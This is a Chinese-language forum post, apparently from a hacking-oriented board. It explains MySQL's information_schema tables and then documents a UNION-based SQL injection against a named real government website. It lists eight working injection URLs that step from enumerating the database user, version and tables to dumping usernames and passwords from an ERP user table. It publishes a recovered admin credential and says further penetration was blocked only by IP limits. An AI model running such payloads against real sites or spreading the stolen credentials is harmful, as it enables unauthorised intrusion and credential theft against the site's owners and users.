一 原理分析 我看看mysql5比之前增加的系统数据库information_schema的结构,它是用来存储数据库系统信息的 mysql> use information_schema; Database changed mysql> show tables; +---------------------------------------+ | Tables_in_information_schema | +---------------------------------------+ | CHARACTER_SETS | | COLLATIONS | | COLLATION_CHARACTER_SET_APPLICABILITY | | COLUMNS | | COLUMN_PRIVILEGES | | KEY_COLUMN_USAGE | | ROUTINES | | SCHEMATA | | SCHEMA_PRIVILEGES | | STATISTICS | | TABLES | | TABLE_CONSTRAINTS | | TABLE_PRIVILEGES | | TRIGGERS | | USER_PRIVILEGES | | VIEWS | +---------------------------------------+ 这里只挑注射中可以用到的几个表。 | SCHEMATA ――>存储数据库名的, |——>关键字段:SCHEMA_NAME,表示数据库名称 | TABLES ――>存储表名的 |——>关键字段:TABLE_SCHEMA表示表所属的数据库名称; TABLE_NAME表示表的名称 | COLUMNS ――>存储字段名的 |——>关键字段:TABLE_SCHEMA表示表所属的数据库名称; TABLE_NAME表示所属的表的名称 COLUMN_NAME表示字段名 二注入过程 1:http://oms.hec.gov.pk/?comp=newsletter_display.php&id=-19791009%20union%20all%20select%201,2,3,4,5,user(),7,8,9,10,11,12--用户 2:http://oms.hec.gov.pk/?comp=newsletter_display.php&id=-19791009%20union%20all%20select%201,2,3,4,5,version(),7,8,9,10,11,12--版本 3:http://oms.hec.gov.pk/?comp=newsletter_display.php&id=-19791009%20union%20all%20select%201,2,3,4,5,database(),7,8,9,10,11,12--数据库 4:http://oms.hec.gov.pk/?comp=newsletter_display.php&id=-19791009%20union%20all%20select%201,2,3,4,5,table_name,7,8,9,10,11,12%20from%20information_schema.tables%20limit%201,1--递归字段名 5:http://oms.hec.gov.pk/?comp=newsletter_display.php&id=-19791009%20union%20all%20select%201,2,3,4,5,table_name,7,8,9,10,11,12%20from%20information_schema.tables%20limit%2034,1--继续递归 6:http://oms.hec.gov.pk/?comp=newsletter_display.php&id=-19791009%20union%20all%20select%201,2,3,4,5,column_name,7,8,9,10,11,12%20from%20information_schema.columns%20where%20table_name=char(69,82,80,95,85,83,69,82)%20limit%204,1/*字段里的表名 7:http://oms.hec.gov.pk/?comp=newsletter_display.php&id=-19791009%20union%20all%20select%201,2,3,4,5,column_name,7,8,9,10,11,12%20from%20information_schema.columns%20where%20table_name=char(69,82,80,95,85,83,69,82)%20limit%205,1/*字段里的表明 8:http://oms.hec.gov.pk/?comp=newsletter_display.php&id=-19791009%20union%20all%20select%201,2,3,4,5,concat(USER_NAME,0x3a,PASSWORD),7,8,9,10,11,12%20from%20HEC_OMS.ERP_USER%20limit%201,1/*递增得到密码。 以下这个。 admin:creative 到这里得到好多密码 不同等级的。 由于IP限制渗透需进一步进行 |
|小黑屋|最新主题|手机版|微赢网络技术论坛 ( 苏ICP备08020429号 )
GMT+8, 2024-9-30 17:35 , Processed in 0.128045 second(s), 12 queries , Gzip On, MemCache On.
Powered by Discuz! X3.5
© 2001-2023 Discuz! Team.